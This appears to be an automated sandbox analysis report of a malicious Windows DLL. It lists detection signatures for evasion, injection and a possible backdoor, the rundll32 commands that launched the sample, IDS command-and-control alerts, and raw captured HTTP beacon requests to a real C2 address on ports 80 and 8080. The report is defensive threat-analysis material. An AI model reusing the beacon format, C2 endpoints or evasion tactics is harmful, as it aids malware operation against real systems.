
Windows Analysis Report
LisectAVT_2403002B_14.dll

Overview

General Information

Sample name: LisectAVT_2403002B_14.dll
Analysis ID: 1482059
MD5: 2769761a23f793d93bbad3ded28e8ebd
SHA1: df83ef58856650a7564b0f5d0914dc8478511ccf
SHA256: 0f0a7d189ef514f97279ef24194c08ea5c99dd39a9d7af486ea8aedb68e0f18b
Tags: dllexe
Infos:

Detection

Score: 56
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

System process connects to network (likely due to code injection or exploit)
AI detected suspicious sample
Contains functionality to detect sleep reduction / modifications
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to get notified if a device is plugged in / out
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain checking for process token information
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check if the current machine is a sandbox (GetTickCount - Sleep)
May sleep (evasive loops) to hinder dynamic analysis
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Communication To Uncommon Destination Ports
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication

Classification

  • System is w10x64
  • loaddll32.exe (PID: 6812 cmdline: loaddll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll" MD5: 51E6071F9CBA48E79F10C84515AAE618)
    • conhost.exe (PID: 1320 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 5836 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",#1 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • rundll32.exe (PID: 3192 cmdline: rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",#1 MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 5696 cmdline: rundll32.exe C:\Users\user\Desktop\LisectAVT_2403002B_14.dll,GnrkBltvkx MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 504 cmdline: rundll32.exe C:\Users\user\Desktop\LisectAVT_2403002B_14.dll,GnrkBmoaar MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 2168 cmdline: rundll32.exe C:\Users\user\Desktop\LisectAVT_2403002B_14.dll,GnrkCyrpw MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 6748 cmdline: rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkBltvkx MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 1492 cmdline: rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkBmoaar MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 1416 cmdline: rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkCyrpw MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 5936 cmdline: rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkZtdij MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 516 cmdline: rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkZewk MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 5028 cmdline: rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkXzwnp MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 3516 cmdline: rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkXalbb MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 5068 cmdline: rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkWyey MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 6960 cmdline: rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkWtlrh MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 4980 cmdline: rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkWsnq MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 876 cmdline: rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkWapq MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 5348 cmdline: rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkVnndq MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 3204 cmdline: rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkUsmc MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 2268 cmdline: rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkTrg MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 3892 cmdline: rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkTjxdo MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 6448 cmdline: rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkTch MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 3576 cmdline: rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkTcfv MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 1396 cmdline: rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkStso MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 4148 cmdline: rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkSf MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 6432 cmdline: rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkSbq MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 6600 cmdline: rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkRrdcfn MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 2196 cmdline: rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkQulon MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 2144 cmdline: rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkQr MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 5276 cmdline: rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkQm MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 6968 cmdline: rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkPp MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 5388 cmdline: rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkOxft MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 2864 cmdline: rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkOksgc MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 3896 cmdline: rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkOi MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 3796 cmdline: rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkOhqbhe MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 3924 cmdline: rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkOda MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 5272 cmdline: rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkNsdwzc MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 2828 cmdline: rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkNr MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 6764 cmdline: rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkNofovl MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 5432 cmdline: rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkNlqh MD5: 889B99C52A60DD49227C5E485A016679)
  • cleanup
No configs have been found
No yara matches
Source: Network Connection; Author: Florian Roth (Nextron Systems); Data: DestinationIp: 52.90.110.169, DestinationIsIpv6: false, DestinationPort: 8080, EventID: 3, Image: C:\Windows\SysWOW64\rundll32.exe, Initiated: true, ProcessId: 2144, Protocol: tcp, SourceIp: 192.168.2.6, SourceIsIpv6: false, SourcePort: 49724
No Snort rule has matched
Timestamp                        SID      Source Port  Destination Port  Protocol  Classtype
2024-07-25T17:57:11.023216+0200  2036858  49733        80                TCP       Malware Command and Control Activity Detected
2024-07-25T17:55:50.513790+0200  2036858  49723        80                TCP       Malware Command and Control Activity Detected
2024-07-25T17:56:37.112001+0200  2036858  49729        8080              TCP       Malware Command and Control Activity Detected
2024-07-25T17:55:09.573145+0200  2022930  443          49720             TCP       A Network Trojan was detected
2024-07-25T17:55:33.455482+0200  2036858  49721        80                TCP       Malware Command and Control Activity Detected
2024-07-25T17:57:16.369027+0200  2036858  49734        80                TCP       Malware Command and Control Activity Detected
2024-07-25T17:56:23.050140+0200  2036858  49726        8080              TCP       Malware Command and Control Activity Detected
2024-07-25T17:55:11.045496+0200  2036858  49718        80                TCP       Malware Command and Control Activity Detected
2024-07-25T17:54:31.588390+0200  2022930  443          49713             TCP       A Network Trojan was detected
2024-07-25T17:57:05.987539+0200  2036858  49732        80                TCP       Malware Command and Control Activity Detected
2024-07-25T17:56:32.080676+0200  2036858  49728        8080              TCP       Malware Command and Control Activity Detected


AV Detection

Source: Submitted Sample; Integrated Neural Analysis Model: Matched 98.9% probability
Source: C:\Windows\System32\loaddll32.exe; Code function: 0_2_6CD591E0 FileEncryptionStatusW,0_2_6CD591E0
Source: C:\Windows\SysWOW64\rundll32.exe; Code function: 30_2_6CD591E0 FileEncryptionStatusW,30_2_6CD591E0
Source: LisectAVT_2403002B_14.dll; Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, DLL
Source: unknown; HTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:49710 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:49712 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 52.165.165.26:443 -> 192.168.2.6:49713 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:49717 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:49719 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 52.165.165.26:443 -> 192.168.2.6:49720 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:49722 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:49725 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:49727 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:49731 version: TLS 1.2
Source: LisectAVT_2403002B_14.dll; Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: C:\Windows\System32\loaddll32.exe; Code function: 0_2_6CD52C90 UnregisterDeviceNotification,0_2_6CD52C90

Networking

Source: C:\Windows\SysWOW64\rundll32.exe; Network Connect: 52.90.110.169 80
Source: C:\Windows\SysWOW64\rundll32.exe; Domain query: ec2-52-90-110-169.compute-1.amazonaws.com
Source: global traffic; TCP traffic: 192.168.2.6:49724 -> 52.90.110.169:8080
Source: Joe Sandbox View; IP Address: 1.1.1.1
Source: Joe Sandbox View; IP Address: 40.115.3.253
Source: Joe Sandbox View; ASN Name: AMAZON-AESUS
Source: Joe Sandbox View; JA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
Source: Joe Sandbox View; JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: global traffic; HTTP traffic detected:
    POST /update?id=d791f282 HTTP/1.1
    Accept: */*
    X-Session: 0
    X-Status: 0
    X-Size: 61456
    X-Sn: 1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;SV1;
    Host: 52.90.110.169
    Content-Length: 0
    Connection: Keep-Alive
    Cache-Control: no-cache
Source: global traffic; HTTP traffic detected:
    POST /update?id=36ebb732 HTTP/1.1
    Accept: */*
    X-Session: 0
    X-Status: 0
    X-Size: 61456
    X-Sn: 1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;SV1;
    Host: 52.90.110.169
    Content-Length: 0
    Connection: Keep-Alive
    Cache-Control: no-cache
Source: global traffic; HTTP traffic detected:
    POST /update?id=8a8b3aa5 HTTP/1.1
    Accept: */*
    X-Session: 0
    X-Status: 0
    X-Size: 61456
    X-Sn: 1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;SV1;
    Host: 52.90.110.169
    Content-Length: 0
    Connection: Keep-Alive
    Cache-Control: no-cache
Source: global traffic; HTTP traffic detected:
    POST /update?id=dc53bbb9 HTTP/1.1
    Accept: */*
    X-Session: 0
    X-Status: 0
    X-Size: 61456
    X-Sn: 1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;SV1;
    Host: 52.90.110.169:8080
    Content-Length: 0
    Connection: Keep-Alive
    Cache-Control: no-cache
Source: global traffic; HTTP traffic detected:
    POST /update?id=71f3cbf7 HTTP/1.1
    Accept: */*
    X-Session: 0
    X-Status: 0
    X-Size: 61456
    X-Sn: 1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;SV1;
    Host: 52.90.110.169:8080
    Content-Length: 0
    Connection: Keep-Alive
    Cache-Control: no-cache
Source: global traffic; HTTP traffic detected:
    POST /update?id=01b63ea5 HTTP/1.1
    Accept: */*
    X-Session: 0
    X-Status: 0
    X-Size: 61456
    X-Sn: 1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;SV1;
    Host: 52.90.110.169:8080
    Content-Length: 0
    Connection: Keep-Alive
    Cache-Control: no-cache
Source: global traffic; HTTP traffic detected:
    POST /update?id=6171a2b6 HTTP/1.1
    Accept: */*
    X-Session: 0
    X-Status: 0
    X-Size: 61456
    X-Sn: 1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;SV1;
    Host: 52.90.110.169
    Content-Length: 0
    Connection: Keep-Alive
    Cache-Control: no-cache
Source: global traffic; HTTP traffic detected:
    POST /update?id=592b1d5c HTTP/1.1
    Accept: */*
    X-Session: 0
    X-Status: 0
    X-Size: 61456
    X-Sn: 1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;SV1;
    Host: 52.90.110.169
    Content-Length: 0
    Connection: Keep-Alive
    Cache-Control: no-cache
Source: global traffic; HTTP traffic detected:
    POST /update?id=7e9d30a3 HTTP/1.1
    Accept: */*
    X-Session: 0
    X-Status: 0
    X-Size: 61456
    X-Sn: 1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;SV1;
    Host: 52.90.110.169
    Content-Length: 0
    Connection: Keep-Alive
    Cache-Control: no-cache
Source: unknown; TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown; TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown; TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown; TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown; TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown; TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown; TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown; TCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknown; TCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknown; TCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknown; TCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknown; TCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknown; TCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknown; TCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknown; TCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknown; TCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknown; TCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknown; TCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknown; TCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknown; TCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknown; TCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknown; TCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknown; TCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknown; TCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknown; TCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknown; TCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknown; TCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknown; TCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknown; TCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknown; TCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknown; TCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknown; TCP traffic detected without corresponding DNS query: 2.19.97.171
Source: unknown; TCP traffic detected without corresponding DNS query: 2.19.97.171
Source: unknown; TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown; TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown; TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown; TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown; TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown; TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown; TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown; TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown; TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown; TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown; TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: C:\Windows\SysWOW64\rundll32.exe; Code function: 30_2_6CD72DE0 recv,30_2_6CD72DE0
Source: global traffic; HTTP traffic detected:
    GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=O4c6ORKy9SdKx5O&MD=tSDbY3yp HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
    Host: slscr.update.microsoft.com
Source: global traffic; HTTP traffic detected:
    GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=O4c6ORKy9SdKx5O&MD=tSDbY3yp HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
    Host: slscr.update.microsoft.com
Source: global traffic; DNS traffic detected: DNS query: ec2-52-90-110-169.compute-1.amazonaws.com
Source: unknown; HTTP traffic detected:
    POST /update?id=d791f282 HTTP/1.1
    Accept: */*
    X-Session: 0
    X-Status: 0
    X-Size: 61456
    X-Sn: 1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;SV1;
    Host: 52.90.110.169
    Content-Length: 0
    Connection: Keep-Alive
    Cache-Control: no-cache
Source: rundll32.exe, 0000001E.00000003.3082529548.0000000003357000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001E.00000003.3548312483.0000000003357000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001E.00000003.3942314601.0000000003357000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001E.00000003.3776753542.0000000003357000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001E.00000003.3548563603.0000000003357000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001E.00000003.3548865811.0000000003357000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001E.00000002.3964912413.0000000003357000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001E.00000003.3082738725.0000000003357000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001E.00000003.3306814433.0000000003357000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001E.00000003.3082804877.0000000003357000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://52.90.110.169/update?id=36ebb732
Source: rundll32.exe, 0000001E.00000003.3082529548.0000000003357000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001E.00000003.3082738725.0000000003357000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001E.00000003.3306814433.0000000003357000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001E.00000003.3082804877.0000000003357000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://52.90.110.169/update?id=36ebb732Q
Source: rundll32.exe, 0000001E.00000003.3082529548.0000000003357000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001E.00000003.3548312483.0000000003357000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001E.00000003.3942314601.0000000003357000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001E.00000003.3776753542.0000000003357000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001E.00000003.3548563603.0000000003357000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001E.00000003.3548865811.0000000003357000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001E.00000002.3964912413.0000000003357000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001E.00000003.3082738725.0000000003357000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001E.00000003.3306814433.0000000003357000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001E.00000003.3082804877.0000000003357000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://52.90.110.169/update?id=36ebb732R
Source: rundll32.exe, 0000001E.00000002.3964912413.0000000003357000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://52.90.110.169/update?id=592b1d5c
Source: rundll32.exe, 0000001E.00000003.3942314601.0000000003357000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001E.00000002.3964912413.0000000003357000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://52.90.110.169/update?id=592b1d5c5
Source: rundll32.exe, 0000001E.00000003.3942314601.0000000003357000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001E.00000002.3964912413.0000000003357000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://52.90.110.169/update?id=6171a2b6
Source: rundll32.exe, 0000001E.00000002.3964912413.0000000003357000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001E.00000002.3964912413.00000000032BA000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://52.90.110.169/update?id=7e9d30a3
Source: rundll32.exe, 0000001E.00000003.3942314601.0000000003357000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001E.00000002.3964912413.0000000003357000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://52.90.110.169/update?id=7e9d30a3H
Source: rundll32.exe, 0000001E.00000003.3942314601.0000000003357000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001E.00000002.3964912413.0000000003357000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://52.90.110.169/update?id=7e9d30a3Q
Source: rundll32.exe, 0000001E.00000003.3942314601.0000000003357000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001E.00000002.3964912413.0000000003357000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://52.90.110.169/update?id=7e9d30a3s
Source: rundll32.exe, 0000001E.00000003.3082804877.0000000003357000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://52.90.110.169/update?id=8a8b3aa5
Source: rundll32.exe, 0000001E.00000003.3082529548.0000000003357000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001E.00000003.3548312483.0000000003357000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001E.00000003.3942314601.0000000003357000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001E.00000003.3776753542.0000000003357000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001E.00000003.3548563603.0000000003357000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001E.00000003.3548865811.0000000003357000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001E.00000002.3964912413.0000000003357000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001E.00000003.3082738725.0000000003357000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001E.00000003.3306814433.0000000003357000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001E.00000003.3082804877.0000000003357000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://52.90.110.169/update?id=8a8b3aa5i
Source: rundll32.exe, 0000001E.00000003.3082529548.0000000003357000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001E.00000003.3548312483.0000000003357000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001E.00000003.3942314601.0000000003357000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001E.00000003.3776753542.0000000003357000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001E.00000003.3548563603.0000000003357000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001E.00000003.3548865811.0000000003357000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001E.00000002.3964912413.0000000003357000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001E.00000003.3082738725.0000000003357000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001E.00000003.3306814433.0000000003357000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001E.00000003.3082804877.0000000003357000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://52.90.110.169/update?id=d791f282
Source: rundll32.exe, 0000001E.00000003.3548312483.0000000003357000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001E.00000002.3964912413.0000000003362000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001E.00000003.3942314601.0000000003362000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001E.00000003.3776753542.0000000003357000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001E.00000003.3548563603.0000000003357000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001E.00000003.3548865811.0000000003357000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001E.00000002.3964912413.00000000032BA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001E.00000002.3964912413.00000000032F5000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://52.90.110.169:8080/update?id=01b63ea5
Source: rundll32.exe, 0000001E.00000003.3548312483.0000000003357000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001E.00000003.3776753542.0000000003357000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001E.00000003.3548563603.0000000003357000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001E.00000003.3548865811.0000000003357000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://52.90.110.169:8080/update?id=01b63ea5date?id=d791f282
Source: rundll32.exe, 0000001E.00000002.3964912413.0000000003362000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001E.00000003.3942314601.0000000003362000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://52.90.110.169:8080/update?id=01b63ea5fa
Source: rundll32.exe, 0000001E.00000003.3942314601.0000000003362000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001E.00000003.3776753542.0000000003357000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001E.00000003.3548563603.0000000003357000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001E.00000003.3548865811.0000000003357000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001E.00000002.3964912413.00000000032BA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001E.00000002.3964912413.00000000032F5000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://52.90.110.169:8080/update?id=71f3cbf7
